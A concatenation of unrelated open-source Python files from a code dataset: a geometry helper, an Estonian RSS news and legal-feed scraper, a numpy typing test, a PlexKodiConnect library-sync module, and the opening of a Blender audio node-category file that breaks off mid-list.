        """Return True if p1 is behind p2 (p1.x < p2.x)."""
        return p1.x < p2.x

    @staticmethod
    def is_left_of(p1, p2):
        """Return True if p1 is to the left of p2 (p1.y >= p2.y)."""
        return p1.y >= p2.y

    @staticmethod
    def is_right_of(p1, p2):
        """Return True if p1 is to the right of p2 (p1.y < p2.y)."""
        return p1.y < p2.y
| jdddog/hri | hri_api/src/hri_api/math/geom_math.py | Python | bsd-3-clause | 723 |
# -*- coding: utf-8 -*-
import sys
sys.path.insert(0, 'libs')
import urllib2
from datetime import datetime as dt
import logging
from time import mktime
import bs4
import feedparser
from collections import defaultdict
import models
#from google.appengine.api import urlfetch
#urlfetch.set_default_fetch_deadline(45)
import os
file_dir = os.path.dirname(os.path.abspath(__file__))
new_path = os.path.split(file_dir)[0]
sys.path.insert(0, new_path) # to get utils from root folder.. this might be obsolete
categories = [\
['Delfi','http://feeds2.feedburner.com/delfiuudised?format=xml'], \
['Delfi','http://feeds.feedburner.com/delfimaailm?format=xml'], \
['Delfi','http://feeds.feedburner.com/delfi110-112?format=xml'], \
['Delfi','http://feeds2.feedburner.com/delfimajandus'], \
['Postimees','http://majandus24.postimees.ee/rss'], # majandus \
['Postimees','http://www.postimees.ee/rss/'],\
['Postimees','http://www.postimees.ee/rss/?r=128'], # kirmi \
['ERR','http://www.err.ee/rss'],\
[u'Õhtuleht','http://www.ohtuleht.ee/rss'],\
['raamatupidaja.ee','http://raamatupidaja.ee/RSS.aspx'],\
[u'Päevaleht','http://feeds.feedburner.com/eestipaevaleht?format=xml'],\
['Eesti Ekspress','http://feeds.feedburner.com/EestiEkspressFeed?format=xml'],\
['Maaleht','http://feeds.feedburner.com/maaleht?format=xml'],\
[u'Äripäev','http://www.aripaev.ee/rss'],\
['juura.ee','http://juura.ee/gw.php/news/aggregate/index/format/xml'],\
[u'Деловное Деломости','http://dv.ee/rss'],\
[u'МК-Эстония','http://www.mke.ee/index.php?option=com_k2&view=itemlist&format=feed&type=rss'],\
#[u'äripäev','http://feeds.feedburner.com/aripaev-rss'], # old, also has results, but lags behind\
# ############################ \
['BBC','http://feeds.bbci.co.uk/news/rss.xml?edition=us'],\
['BBC','http://feeds.bbci.co.uk/news/rss.xml?edition=int'],\
['BBC','http://feeds.bbci.co.uk/news/rss.xml?edition=uk'],\
['TIME','http://time.com/newsfeed/feed/'],\
['Forbes','http://www.forbes.com/real-time/feed2/'],\
['CNN','http://rss.cnn.com/rss/edition.rss'],\
['New York Times','http://rss.nytimes.com/services/xml/rss/nyt/HomePage.xml'],\
['Reuters','http://feeds.reuters.com/reuters/businessNews?format=xml'],\
['The Economist','http://www.economist.com/sections/business-finance/rss.xml'],\
['Financial Times','http://www.ft.com/rss/home/uk'],\
['Business Insider','http://feeds2.feedburner.com/businessinsider'],\
['Bloomberg','http://www.bloombergview.com/rss'],\
['New York Post','http://nypost.com/feed/'],\
['The Guardian','http://www.theguardian.com/uk/rss'],\
['Forbes','http://www.forbes.com/real-time/feed2/'],\
['Deutche Welle','http://rss.dw.de/atom/rss-en-all'],\
['Helsingin Sanomat','http://www.helsinkitimes.fi/?format=feed&type=rss'],\
['Wall Street Journal','http://online.wsj.com/xml/rss/3_7014.xml'],\
['Wall Street Journal','http://online.wsj.com/xml/rss/3_7455.xml'],\
['MarketWatch','http://feeds.marketwatch.com/marketwatch/topstories?format=xml'],\
['MarketWatch','http://feeds.marketwatch.com/marketwatch/financial/'],\
#['physorgtech','http://phys.org/rss-feed/technology-news/'],\
# ################################ \
['Riigihanked','https://riigihanked.riik.ee/register/rss/Teated.html'], # SSL certificate failed \
['Riigikohtu uudised','http://www.nc.ee/rss/?uudised=1'],\
['Riigiteataja ilmumas/ilmunud seadused','https://www.riigiteataja.ee/ilmunud_ilmumas.xml'], #uberslow, fix with handler!!!! \
['Riigikogu pressiteated', 'http://feeds.feedburner.com/RiigikoguPressiteated?format=xml'],\
['eurlex kohtuasjad', 'http://eur-lex.europa.eu/ET/display-feed.rss?rssId=163'], # NB! siin on võimalik keelt muuta\
['eurlex komisjoni ettepanekud', 'http://eur-lex.europa.eu/ET/display-feed.rss?rssId=161'],\
[u'eurlex parlament ja nõukogu', 'http://eur-lex.europa.eu/ET/display-feed.rss?rssId=162'],\
['Eversheds Ots & Co' , 'http://www.eversheds.com/code/RSS/Estonia/Estonia/News.xml'],\
['Eversheds Ots & Co' , 'http://www.eversheds.com/code/RSS/Estonia/Estonia/Article.xml'],\
['Lawin' , 'http://www.lawin.ee/ee/uudised/rss/'],\
['Redbaltic' , 'http://www.redbaltic.com/est/rss/'],\
['Sorainen' , 'http://www.sorainen.com/et/RSS/language/et/content_module/All'],\
['Varul' , 'http://www.varul.com/uudised/uudised.rss'],\
['Kaitseministeerium' , 'http://www.kaitseministeerium.ee/et/rss-uudiste-voog'],\
['Finantsministeerium' , 'http://www.fin.ee/rss_uudised'], \
# #################### \
#['Majandusministeerium' , 'https://www.mkm.ee/et/news/all/feed'], ssl fail \
#['haridusministeerium' , 'https://www.hm.ee/et/news/all/feed' ]# ssl certificate - not allowed \
#['lextal' , 'http://www.lextal.ee/feed/' ] # doesn't work, has robots.txt \
['Hiljutised Riigikohtu lahendid','http://www.nc.ee/rss/?lahendid=1&tyyp=K'], # neid, mida muidu otsingust ei leia aga RSS'ist leiab, on dokument eemaldatud \
[u'Kooskõlastamiseks esitatud eelnõud','http://eelnoud.valitsus.ee/main/mount/rss/home/review.rss' ], \
[u'Valitsusele esitatud eelnõud','http://eelnoud.valitsus.ee/main/mount/rss/home/submission.rss' ] \
# ['bbc','http://feeds.bbci.co.uk/news/rss.xml?edition=int' ] \
]
from utils import *
# We need this because ordinary dictionaries can't have duplicate keys (check the case of delfi.ee)
cat_dict = defaultdict(list) # TODO! fix issue with dict removing duplicate keys (eg. multiple Postimees sources)
# Flatten the hard-coded [name, url] pairs under a single 'categories' key.
for listitem in categories:
    cat_dict['categories'].append(listitem)
# add custom RSS categories to category list
# NOTE(review): this query runs at module import time and hits the datastore;
# presumably acceptable on this app's startup path - confirm.
datastore_results = models.CustomCategory.query(models.CustomCategory.category_type == 'rss_source').fetch()
if datastore_results:
    for result in datastore_results:
        cat_dict['categories'].append([result.category_name,result.category_link])
def parse_results_ilmumas(ilmumas_links,querywords):
    """Scrape Riigi Teataja 'ilmumas/ilmunud' result pages for query words.

    For each page URL in ilmumas_links, fetches the HTML, walks the result
    table rows and keeps rows matching each query word (all words must match
    when the query contains spaces; an empty query matches every row).

    Returns a list of [link, title, normalized_date, queryword, category]
    entries.
    """
    results=[]
    url_base='http://www.riigiteataja.ee/'
    for a in ilmumas_links:
        ourlink=a+'&kuvaKoik=true' # force showing all results (the page is otherwise paginated)
        src=urllib2.urlopen(ourlink)
        soup = bs4.BeautifulSoup(src.read())
        soup = soup.find('tbody')
        # down below is a duplicate cycle - could be rafactored
        for q in querywords:
            if ' ' in q: # if space in query, then search for all words
                new_q=set(q.split(' ')) # add to a set
            elif q=='':
                new_q=''
            else:
                new_q=[q]
            for result in soup.findAll("tr"):
                cats=[]
                if all([x2.lower() in unicode(result).lower() for x2 in new_q]): # are the query words present in this row?
                    if result.findAll('a'): # if the row has a link, build a new title and link from it (otherwise things break)
                        newlink = url_base+result.a.get('href')
                        newtitle = result.a(text=True)[0]
                    for item in result.findAll("td"): # find columns
                        result2 = item.find_next(text=True)
                        result2 = re.sub('\n', '', result2.rstrip()) # don't know why I need this
                        cats.append(result2) # add results to list
                    # let's parse results
                    if not cats[0]: # first column empty -> use the anchor's title and link
                        item_title=newtitle
                        item_title = item_title.replace("\t", "")
                        item_link=newlink
                    else:
                        item_title=cats[0]
                        item_title = item_title.replace("\t", "")
                        item_link=ourlink
                    """ Have to use some regex to extract dates """
                    # Strip the "RT I," / "RT III," / other prefix of varying
                    # length before the date portion.
                    if cats[1][0:5]=='RT I,':
                        match = re.search(r'(?<=^.{6}).*', cats[1])
                    elif cats[1][0:7]=='RT III,':
                        match = re.search(r'(?<=^.{8}).*', cats[1])
                    else:
                        match = re.search(r'(?<=^.{7}).*', cats[1])
                    item_date=str(match.group())[0:10]
                    results.append([item_link,item_title,sql_normalize_date(item_date),q,cats[2]])
                    # link, title, date, queryword, category
    return results
def parse_feed(querywords, category, date_algus='2016-01-01'):
    """Search a category's RSS sources for the given query words.

    :param querywords: iterable of query strings; '' matches everything,
        a string with spaces requires all of its words to match
    :param category: category object with .name and .values['rss_sources']
    :param date_algus: start date string; only applied on the eurlex feeds
    :return: list of [link, title, date, queryword, category_name(, 0)]
        entries (the trailing 0 only on regular RSS results)
    """
    date_algus = datetime_object(date_algus)
    results = []
    for search_from in category.values.get('rss_sources'):
        #logging.error(category.values.get('rss_sources'))
        # Special case: the Riigi Teataja 'ilmumas/ilmunud' feed is old-style
        # RSS that does not follow the standard, so it is scraped differently.
        if unicode(category.name) == u'Riigiteataja ilmumas/ilmunud seadused':
            try:
                src2=urllib2.urlopen(search_from).read(5000) # timeout set (search from, timeout=60) because of default appengine limits (and since riigiteataja ilmumas takes long time to open otherwise too)
                soup2 = bs4.BeautifulSoup(src2)
                if soup2: # did we find any results?
                    limiter=10 # needed because App Engine does not honor the read(5000) limit and keeps fetching until timeout
                    links_collection=[]
                    while limiter>0:
                        for link in soup2.findAll("link"):
                            if len(link.next)>50:
                                links_collection.append(link.next)
                        limiter-=1 # count down until 0 (optimization)
                    results.extend(parse_results_ilmumas(links_collection, querywords))
            except Exception, e:
                logging.error(e)
                pass
        else: # standards-compliant RSS feeds
            try:
                # A couple of sources need explicit timeouts / pre-fetching.
                if category.name == 'Finantsministeerium':
                    search_from = urllib2.urlopen(search_from, timeout=40) # without timeout doesn't work
                elif unicode(category.name) == u'Kooskõlastamiseks esitatud eelnõud':
                    search_from = urllib2.urlopen(search_from, timeout=40).read(5000)
                d = feedparser.parse(search_from)
                for a in d.entries:
                    for x in querywords:
                        result_title = None
                        if ' ' in x:
                            new_x = set(x.split(' ')) # add to a set
                        elif x == '':
                            new_x = ''
                        else:
                            new_x = [x]
                        try:
                            tiitel = a['title']
                        except Exception:
                            tiitel = ' '
                            pass
                        # Default to today; overwritten below for normal RSS
                        # entries that carry their own publication date.
                        result_date = datetime.datetime.now().date()
                        if unicode(category.name) in ['eurlex kohtuasjad','eurlex komisjoni ettepanekud',u'eurlex parlament ja nõukogu']:
                            # eurlex feeds: match on title only, filter by date.
                            if result_date >= (date_algus if date_algus else result_date) and (x.lower() in tiitel.lower()):
                                result_title = tiitel
                                result_link = a['link']
                                results.append([result_link, result_title, str(result_date), x, category.name])
                        else:
                            """ Tavaline RSS """
                            # Regular RSS: try the parsed timestamp first, then
                            # fall back to the raw published/pubDate strings.
                            try:
                                result_date = dt.fromtimestamp(mktime(a['published_parsed'])).date()
                            except Exception:
                                pass
                            if not result_date:
                                try:
                                    result_date = a['published']
                                except Exception:
                                    result_date = a['pubDate']
                                    pass
                            # Sometimes we get empty blocks, let's catch them and pass
                            try:
                                summary = a.get('summary')
                            except Exception:
                                summary = ' '
                                pass
                            try:
                                title = a.get('title')
                            except Exception:
                                title = ' '
                                pass
                            try:
                                description = a.get('description')
                            except Exception:
                                description = ' '
                                pass
                            # Match against title, then description, then
                            # summary; entries containing images are skipped.
                            for queryword in new_x:
                                if queryword.decode('utf-8').lower() in title.lower():
                                    result_title = title
                                elif queryword.decode('utf-8').lower() in description.lower():
                                    result_title = description
                                elif queryword.decode('utf-8').lower() in summary.lower():
                                    result_title = summary
                                if result_title:
                                    if 'img ' in result_title:
                                        break
                                    result_title = result_title.replace('<p>','').replace('</p>','')
                                    result_link = a['link']
                                    results.append([result_link, result_title, str(result_date), x, category.name, 0])
            except Exception,e:
                logging.error(e)
                pass
    return results #results if results else None
# TESTING #####
if __name__ == "__main__":
    # Ad-hoc manual test harness; the commented lines are alternative
    # invocations kept for convenience.
    #results=parse_feed(['president',u'jürgen ligi'],'postimees.ee','2014-01-01')
    #results=parse_feed(['president'],'delfi.ee','2014-01-01')
    #results=parse_feed([''],u'Valitsusele esitatud eelnõud','2015-11-25')
    results=parse_feed([''],'bbc','2015-11-25')
    #results=parse_feed(set([u'teenis']),'Finantsministeerium','2015-01-07')
    #results=parse_feed('redbaltic',set([u'tunnistas']),'17.07.2014')
    #results=parse_feed('lextal',set(['luik']),'01.01.2014') # doesn't work
    #results=parse_feed('eurlex kohtuasjad',['Esimese'],'17.07.2014')
    #results=parse_feed('riigiteataja ilmumas',[u'Keskkonna','seadme'],'17.07.2014')
    print len(results)
    for a in results:
        print a, '\n'
from typing import Any, List, TypeVar
import numpy as np
import numpy.typing as npt
_SCT = TypeVar("_SCT", bound=np.generic)
def func1(ar: npt.NDArray[_SCT], a: int) -> npt.NDArray[_SCT]:
    """Typing-only stub: callable handed to np.mask_indices below."""
    pass

def func2(ar: npt.NDArray[np.number[Any]], a: str) -> npt.NDArray[np.float64]:
    """Typing-only stub: callable with a non-int extra argument."""
    pass
AR_b: npt.NDArray[np.bool_]
AR_u: npt.NDArray[np.uint64]
AR_i: npt.NDArray[np.int64]
AR_f: npt.NDArray[np.float64]
AR_c: npt.NDArray[np.complex128]
AR_O: npt.NDArray[np.object_]
AR_LIKE_b: List[bool]
reveal_type(np.fliplr(AR_b)) # E: numpy.ndarray[Any, numpy.dtype[numpy.bool_]]
reveal_type(np.fliplr(AR_LIKE_b)) # E: numpy.ndarray[Any, numpy.dtype[Any]]
reveal_type(np.flipud(AR_b)) # E: numpy.ndarray[Any, numpy.dtype[numpy.bool_]]
reveal_type(np.flipud(AR_LIKE_b)) # E: numpy.ndarray[Any, numpy.dtype[Any]]
reveal_type(np.eye(10)) # E: numpy.ndarray[Any, numpy.dtype[{float64}]]
reveal_type(np.eye(10, M=20, dtype=np.int64)) # E: numpy.ndarray[Any, numpy.dtype[{int64}]]
reveal_type(np.eye(10, k=2, dtype=int)) # E: numpy.ndarray[Any, numpy.dtype[Any]]
reveal_type(np.diag(AR_b)) # E: numpy.ndarray[Any, numpy.dtype[numpy.bool_]]
reveal_type(np.diag(AR_LIKE_b, k=0)) # E: numpy.ndarray[Any, numpy.dtype[Any]]
reveal_type(np.diagflat(AR_b)) # E: numpy.ndarray[Any, numpy.dtype[numpy.bool_]]
reveal_type(np.diagflat(AR_LIKE_b, k=0)) # E: numpy.ndarray[Any, numpy.dtype[Any]]
reveal_type(np.tri(10)) # E: numpy.ndarray[Any, numpy.dtype[{float64}]]
reveal_type(np.tri(10, M=20, dtype=np.int64)) # E: numpy.ndarray[Any, numpy.dtype[{int64}]]
reveal_type(np.tri(10, k=2, dtype=int)) # E: numpy.ndarray[Any, numpy.dtype[Any]]
reveal_type(np.tril(AR_b)) # E: numpy.ndarray[Any, numpy.dtype[numpy.bool_]]
reveal_type(np.tril(AR_LIKE_b, k=0)) # E: numpy.ndarray[Any, numpy.dtype[Any]]
reveal_type(np.triu(AR_b)) # E: numpy.ndarray[Any, numpy.dtype[numpy.bool_]]
reveal_type(np.triu(AR_LIKE_b, k=0)) # E: numpy.ndarray[Any, numpy.dtype[Any]]
reveal_type(np.vander(AR_b)) # E: numpy.ndarray[Any, numpy.dtype[numpy.signedinteger[Any]]]
reveal_type(np.vander(AR_u)) # E: numpy.ndarray[Any, numpy.dtype[numpy.signedinteger[Any]]]
reveal_type(np.vander(AR_i, N=2)) # E: numpy.ndarray[Any, numpy.dtype[numpy.signedinteger[Any]]]
reveal_type(np.vander(AR_f, increasing=True)) # E: numpy.ndarray[Any, numpy.dtype[numpy.floating[Any]]]
reveal_type(np.vander(AR_c)) # E: numpy.ndarray[Any, numpy.dtype[numpy.complexfloating[Any, Any]]]
reveal_type(np.vander(AR_O)) # E: numpy.ndarray[Any, numpy.dtype[numpy.object_]]
reveal_type(np.histogram2d(AR_i, AR_b)) # E: Tuple[numpy.ndarray[Any, numpy.dtype[{float64}]], numpy.ndarray[Any, numpy.dtype[numpy.floating[Any]]], numpy.ndarray[Any, numpy.dtype[numpy.floating[Any]]]]
reveal_type(np.histogram2d(AR_f, AR_f)) # E: Tuple[numpy.ndarray[Any, numpy.dtype[{float64}]], numpy.ndarray[Any, numpy.dtype[numpy.floating[Any]]], numpy.ndarray[Any, numpy.dtype[numpy.floating[Any]]]]
reveal_type(np.histogram2d(AR_f, AR_c, weights=AR_LIKE_b)) # E: Tuple[numpy.ndarray[Any, numpy.dtype[{float64}]], numpy.ndarray[Any, numpy.dtype[numpy.complexfloating[Any, Any]]], numpy.ndarray[Any, numpy.dtype[numpy.complexfloating[Any, Any]]]]
reveal_type(np.mask_indices(10, func1)) # E: Tuple[numpy.ndarray[Any, numpy.dtype[{intp}]], numpy.ndarray[Any, numpy.dtype[{intp}]]]
reveal_type(np.mask_indices(8, func2, "0")) # E: Tuple[numpy.ndarray[Any, numpy.dtype[{intp}]], numpy.ndarray[Any, numpy.dtype[{intp}]]]
reveal_type(np.tril_indices(10)) # E: Tuple[numpy.ndarray[Any, numpy.dtype[{int_}]], numpy.ndarray[Any, numpy.dtype[{int_}]]]
reveal_type(np.tril_indices_from(AR_b)) # E: Tuple[numpy.ndarray[Any, numpy.dtype[{int_}]], numpy.ndarray[Any, numpy.dtype[{int_}]]]
reveal_type(np.triu_indices(10)) # E: Tuple[numpy.ndarray[Any, numpy.dtype[{int_}]], numpy.ndarray[Any, numpy.dtype[{int_}]]]
reveal_type(np.triu_indices_from(AR_b)) # E: Tuple[numpy.ndarray[Any, numpy.dtype[{int_}]], numpy.ndarray[Any, numpy.dtype[{int_}]]]
| simongibbons/numpy | numpy/typing/tests/data/reveal/twodim_base.py | Python | bsd-3-clause | 3,981 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import absolute_import, division, unicode_literals
from logging import getLogger
import Queue
import xbmcgui
from .get_metadata import GetMetadataThread
from .fill_metadata_queue import FillMetadataQueue
from .process_metadata import ProcessMetadataThread
from . import common, sections
from .. import utils, timing, backgroundthread as bg, variables as v, app
from .. import plex_functions as PF, itemtypes, path_ops
if common.PLAYLIST_SYNC_ENABLED:
from .. import playlists
LOG = getLogger('PLEX.sync.full_sync')
DELETION_BATCH_SIZE = 250
PLAYSTATE_BATCH_SIZE = 5000
# Max. number of plex_ids held in memory for later processing
BACKLOG_QUEUE_SIZE = 10000
# Max number of xmls held in memory
XML_QUEUE_SIZE = 500
# Safety margin to filter PMS items - how many seconds to look into the past?
UPDATED_AT_SAFETY = 60 * 5
LAST_VIEWED_AT_SAFETY = 60 * 5
class FullSync(common.LibrarySyncMixin, bg.KillableThread):
    """Performs a full sync of the Plex library into the Kodi database.

    Pipeline: a FillMetadataQueue scanner thread queues plex_ids, several
    GetMetadataThread workers download XML metadata from the PMS, and one
    ProcessMetadataThread writes the results to the databases. Afterwards
    playstates are synched and items no longer on the PMS are deleted.
    """
    def __init__(self, repair, callback, show_dialog):
        """
        repair=True: force sync EVERY item
        """
        self.successful = True
        self.repair = repair
        self.callback = callback
        # For progress dialog
        self.show_dialog = show_dialog
        self.show_dialog_userdata = utils.settings('playstate_sync_indicator') == 'true'
        if self.show_dialog:
            self.dialog = xbmcgui.DialogProgressBG()
            self.dialog.create(utils.lang(39714))
        else:
            self.dialog = None
        # Timestamp of this sync run; also used later to find stale items
        self.current_time = timing.plex_now()
        self.last_section = sections.Section()
        self.install_sync_done = utils.settings('SyncInstallRunDone') == 'true'
        super(FullSync, self).__init__()
    def update_progressbar(self, section, title, current):
        """Advance the background progress dialog for *section*.

        *current* is 0-based; the dialog displays 1-based counts. The dialog
        is closed as soon as Kodi starts playing a video so it does not
        disturb playback.
        """
        if not self.dialog:
            return
        # Displayed count is 1-based
        current += 1
        try:
            progress = int(float(current) / float(section.number_of_items) * 100.0)
        except ZeroDivisionError:
            progress = 0
        self.dialog.update(progress,
                           '%s (%s)' % (section.name, section.section_type_text),
                           '%s %s/%s'
                           % (title, current, section.number_of_items))
        if app.APP.is_playing_video:
            self.dialog.close()
            self.dialog = None
    @staticmethod
    def copy_plex_db():
        """
        Takes the current plex.db file and copies it to plex-copy.db
        This will allow us to have "concurrent" connections during adding/
        updating items, increasing sync speed tremendously.
        Using the same DB with e.g. WAL mode did not really work out...
        """
        path_ops.copyfile(v.DB_PLEX_PATH, v.DB_PLEX_COPY_PATH)
    @utils.log_time
    def process_new_and_changed_items(self, section_queue, processing_queue):
        """Run the scanner/downloader/processor thread pipeline to completion.

        Spawns one FillMetadataQueue scanner, a user-configurable number of
        GetMetadataThread downloaders and one ProcessMetadataThread, then
        joins them in that order. Sets self.successful from the processing
        thread's outcome.
        """
        LOG.debug('Start working')
        get_metadata_queue = Queue.Queue(maxsize=BACKLOG_QUEUE_SIZE)
        scanner_thread = FillMetadataQueue(self.repair,
                                           section_queue,
                                           get_metadata_queue,
                                           processing_queue)
        scanner_thread.start()
        metadata_threads = [
            GetMetadataThread(get_metadata_queue, processing_queue)
            for _ in range(int(utils.settings('syncThreadNumber')))
        ]
        for t in metadata_threads:
            t.start()
        process_thread = ProcessMetadataThread(self.current_time,
                                               processing_queue,
                                               self.update_progressbar)
        process_thread.start()
        LOG.debug('Waiting for scanner thread to finish up')
        scanner_thread.join()
        LOG.debug('Waiting for metadata download threads to finish up')
        for t in metadata_threads:
            t.join()
        LOG.debug('Download metadata threads finished')
        process_thread.join()
        self.successful = process_thread.successful
        LOG.debug('threads finished work. successful: %s', self.successful)
    @utils.log_time
    def processing_loop_playstates(self, section_queue):
        """Consume sections from section_queue (until the None sentinel) and
        sync playstates for each of them."""
        while not self.should_cancel():
            section = section_queue.get()
            section_queue.task_done()
            if section is None:
                # Sentinel put by threaded_get_generators - we are done
                break
            self.playstate_per_section(section)
    def playstate_per_section(self, section):
        """Sync playstate (watched state, user rating, ...) for every item of
        a single library section, committing in PLAYSTATE_BATCH_SIZE batches."""
        LOG.debug('Processing %s playstates for library section %s',
                  section.number_of_items, section)
        try:
            with section.context(self.current_time) as context:
                for xml in section.iterator:
                    section.count += 1
                    if not context.update_userdata(xml, section.plex_type):
                        # Somehow did not sync this item yet
                        context.add_update(xml,
                                           section_name=section.name,
                                           section_id=section.section_id)
                    context.plexdb.update_last_sync(int(xml.attrib['ratingKey']),
                                                    section.plex_type,
                                                    self.current_time)
                    self.update_progressbar(section, '', section.count - 1)
                    if section.count % PLAYSTATE_BATCH_SIZE == 0:
                        context.commit()
        except RuntimeError:
            LOG.error('Could not entirely process section %s', section)
            self.successful = False
    def threaded_get_generators(self, kinds, section_queue, items):
        """
        Getting iterators is costly, so let's do it in a dedicated thread

        *items* is one of 'all', 'watched' or 'updated' and determines the
        updated_at/last_viewed_at filters passed on to the PMS. Always puts
        a None sentinel into section_queue when done (even on error).
        """
        LOG.debug('Start threaded_get_generators')
        try:
            for kind in kinds:
                for section in (x for x in app.SYNC.sections
                                if x.section_type == kind[1]):
                    if self.should_cancel():
                        LOG.debug('Need to exit now')
                        return
                    if not section.sync_to_kodi:
                        LOG.info('User chose to not sync section %s', section)
                        continue
                    section = sections.get_sync_section(section,
                                                        plex_type=kind[0])
                    # Look a bit into the past to not miss borderline updates
                    timestamp = section.last_sync - UPDATED_AT_SAFETY \
                        if section.last_sync else None
                    if items == 'all':
                        updated_at = None
                        last_viewed_at = None
                    elif items == 'watched':
                        if not timestamp:
                            # No need to sync playstate updates since section
                            # has not yet been synched
                            continue
                        else:
                            updated_at = None
                            last_viewed_at = timestamp
                    elif items == 'updated':
                        updated_at = timestamp
                        last_viewed_at = None
                    try:
                        section.iterator = PF.get_section_iterator(
                            section.section_id,
                            plex_type=section.plex_type,
                            updated_at=updated_at,
                            last_viewed_at=last_viewed_at)
                    except RuntimeError:
                        LOG.error('Sync at least partially unsuccessful!')
                        LOG.error('Error getting section iterator %s', section)
                    else:
                        section.number_of_items = section.iterator.total
                        if section.number_of_items > 0:
                            section_queue.put(section)
                            LOG.debug('Put section in queue with %s items: %s',
                                      section.number_of_items, section)
        except Exception:
            utils.ERROR(notify=True)
        finally:
            # Sentinel for the section queue
            section_queue.put(None)
        LOG.debug('Exiting threaded_get_generators')
    def full_library_sync(self):
        """Run the complete sync: new/changed items, playstates, playlists
        and finally deletion of items no longer present on the PMS."""
        section_queue = Queue.Queue()
        processing_queue = bg.ProcessingQueue(maxsize=XML_QUEUE_SIZE)
        kinds = [
            (v.PLEX_TYPE_MOVIE, v.PLEX_TYPE_MOVIE),
            (v.PLEX_TYPE_SHOW, v.PLEX_TYPE_SHOW),
            (v.PLEX_TYPE_SEASON, v.PLEX_TYPE_SHOW),
            (v.PLEX_TYPE_EPISODE, v.PLEX_TYPE_SHOW)
        ]
        if app.SYNC.enable_music:
            kinds.extend([
                (v.PLEX_TYPE_ARTIST, v.PLEX_TYPE_ARTIST),
                (v.PLEX_TYPE_ALBUM, v.PLEX_TYPE_ARTIST),
            ])
        # ADD NEW ITEMS
        # We need to enforce syncing e.g. show before season before episode
        bg.FunctionAsTask(self.threaded_get_generators,
                          None,
                          kinds,
                          section_queue,
                          items='all' if self.repair else 'updated').start()
        # Do the heavy lifting
        self.process_new_and_changed_items(section_queue, processing_queue)
        common.update_kodi_library(video=True, music=True)
        if self.should_cancel() or not self.successful:
            return
        # In order to not delete all your songs again for playstate synch
        if app.SYNC.enable_music:
            kinds.extend([
                (v.PLEX_TYPE_SONG, v.PLEX_TYPE_ARTIST),
            ])
        # Update playstate progress since last sync - especially useful for
        # users of very large libraries since this step is very fast
        # These playstates will be synched twice
        LOG.debug('Start synching playstate for last watched items')
        bg.FunctionAsTask(self.threaded_get_generators,
                          None,
                          kinds,
                          section_queue,
                          items='watched').start()
        self.processing_loop_playstates(section_queue)
        if self.should_cancel() or not self.successful:
            return
        # Sync Plex playlists to Kodi and vice-versa
        if common.PLAYLIST_SYNC_ENABLED:
            LOG.debug('Start playlist sync')
            if self.show_dialog:
                if self.dialog:
                    self.dialog.close()
                self.dialog = xbmcgui.DialogProgressBG()
                # "Synching playlists"
                self.dialog.create(utils.lang(39715))
            if not playlists.full_sync() or self.should_cancel():
                return
        # SYNC PLAYSTATE of ALL items (otherwise we won't pick up on items that
        # were set to unwatched or changed user ratings). Also mark all items on
        # the PMS to be able to delete the ones still in Kodi
        LOG.debug('Start synching playstate and userdata for every item')
        # Make sure we're not showing an item's title in the sync dialog
        if not self.show_dialog_userdata and self.dialog:
            # Close the progress indicator dialog
            self.dialog.close()
            self.dialog = None
        bg.FunctionAsTask(self.threaded_get_generators,
                          None,
                          kinds,
                          section_queue,
                          items='all').start()
        self.processing_loop_playstates(section_queue)
        if self.should_cancel() or not self.successful:
            return
        # Delete movies that are not on Plex anymore
        LOG.debug('Looking for items to delete')
        kinds = [
            (v.PLEX_TYPE_MOVIE, itemtypes.Movie),
            (v.PLEX_TYPE_SHOW, itemtypes.Show),
            (v.PLEX_TYPE_SEASON, itemtypes.Season),
            (v.PLEX_TYPE_EPISODE, itemtypes.Episode)
        ]
        if app.SYNC.enable_music:
            kinds.extend([
                (v.PLEX_TYPE_ARTIST, itemtypes.Artist),
                (v.PLEX_TYPE_ALBUM, itemtypes.Album),
                (v.PLEX_TYPE_SONG, itemtypes.Song)
            ])
        for plex_type, context in kinds:
            # Delete movies that are not on Plex anymore
            while True:
                with context(self.current_time) as ctx:
                    # Items whose last_sync predates this run are stale
                    plex_ids = list(
                        ctx.plexdb.plex_id_by_last_sync(plex_type,
                                                        self.current_time,
                                                        DELETION_BATCH_SIZE))
                    for plex_id in plex_ids:
                        if self.should_cancel():
                            return
                        ctx.remove(plex_id, plex_type)
                if len(plex_ids) < DELETION_BATCH_SIZE:
                    break
        LOG.debug('Done looking for items to delete')
    @utils.log_time
    def _run(self):
        """Top-level sync driver: sync sections, copy the DB, run the full
        library sync and always report the outcome via self.callback."""
        try:
            # Get latest Plex libraries and build playlist and video node files
            if self.should_cancel() or not sections.sync_from_pms(self):
                return
            self.copy_plex_db()
            self.full_library_sync()
        finally:
            common.update_kodi_library(video=True, music=True)
            if self.dialog:
                self.dialog.close()
            if not self.successful and not self.should_cancel():
                # "ERROR in library sync"
                utils.dialog('notification',
                             heading='{plex}',
                             message=utils.lang(39410),
                             icon='{error}')
            self.callback(self.successful)
def start(show_dialog, repair=False, callback=None):
    """Entry point: run a full sync synchronously in the calling thread."""
    sync = FullSync(repair, callback, show_dialog)
    # Call run() and NOT start in order to not spawn another thread
    sync.run()
| croneter/PlexKodiConnect | resources/lib/library_sync/full_sync.py | Python | gpl-2.0 | 13,934 |
# -*- coding: utf-8 -*-
# ##### BEGIN GPL LICENSE BLOCK #####
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software Foundation,
# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
# ##### END GPL LICENSE BLOCK #####
from collections import OrderedDict
from nodeitems_utils import NodeItem
from FLOW.node_tree import FlowNodeCategory
def make_node_cats():
    """Return the node categories as an OrderedDict.

    Keys are category names; values are lists of [bl_idname, shortname]
    entries (an optional icon element may follow the shortname).
    """
    categories = (
        ("oscillators", [
            ['UgenSinOsc', 'SinOsc'],
            ['UgenFSinOsc', 'FSinOsc'],
            ['UgenSinOscFB', 'SinOscFB'],
            ['UgenBlip', 'Blip'],
            ['UgenPulse', 'Pulse'],
            ['UgenSaw', 'Saw'],
        ]),
        ("filters", [
            ['UgenLPF', 'LPF'],
            ['UgenRLPF', 'RLPF'],
            ['UgenMoogFF', 'MoogFF'],
        ]),
        ("noise", [
            ['UgenLFNoise0', 'LFNoise0'],
